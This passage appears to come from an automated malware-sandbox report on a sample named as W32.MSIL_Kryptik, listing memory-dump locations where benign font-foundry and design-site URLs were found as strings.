Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346883664.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346973547.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346639113.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cnpt
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346883664.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346639113.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cnsofqxx
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347663096.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347164026.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348081227.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348291004.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346883664.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348167056.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347319272.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347907945.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347609249.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347092731.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346973547.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347557474.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347203168.0000000005F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cnthe
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347663096.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347164026.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348081227.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348700807.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348527607.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348291004.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346883664.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348852099.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348167056.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347319272.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347028490.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346759481.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347907945.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347609249.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347463858.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347791626.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348471851.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347092731.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346973547.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.347557474.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.348761376.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cnw
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.357645729.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.357645729.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.361831271.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.358838431.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.361696046.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.359655805.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.363105723.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.362852283.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.360042860.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.361430870.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.361278692.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.358471484.0000000005F67000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.360962312.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346045053.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349869464.0000000005F64000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350322150.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350247010.0000000005F63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349456760.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/8hd
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350523960.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350352934.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350660943.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349972984.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349919972.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350431962.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350141461.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349799819.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350740231.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350198641.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350463469.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350382122.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349567418.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349754657.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350022254.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349869464.0000000005F64000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350322150.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350247010.0000000005F63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Ai
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349799819.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349754657.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349869464.0000000005F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Hi
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349659079.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349567418.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349456760.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350523960.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349659079.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350352934.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350660943.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349972984.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349919972.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350431962.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350141461.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349799819.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350740231.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350198641.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350463469.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350382122.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349567418.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349754657.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350022254.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349869464.0000000005F64000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350322150.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350247010.0000000005F63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0tr
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349456760.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/es-e
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349456760.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/ge
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349659079.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349799819.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349567418.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349456760.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349754657.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349869464.0000000005F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349659079.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349972984.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349919972.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350141461.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349799819.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350198641.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349567418.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349754657.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350022254.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349869464.0000000005F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/8hd
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349659079.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Ai
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349659079.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349972984.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349919972.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350141461.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349799819.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350198641.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349754657.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350022254.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349869464.0000000005F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/li
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349567418.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349456760.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/li
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349659079.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349567418.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/sdi
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349659079.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349972984.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349919972.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350141461.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349799819.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350198641.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349567418.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349456760.0000000005F5C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349754657.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.350022254.0000000005F63000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.349869464.0000000005F64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/t
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.341802100.0000000005F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.341802100.0000000005F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.comtiK
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.341802100.0000000005F42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com~
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346182160.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000002.437464140.0000000007152000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.345941905.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346045053.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346256859.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346182160.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe, 00000001.00000003.346045053.0000000005F5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.krimr
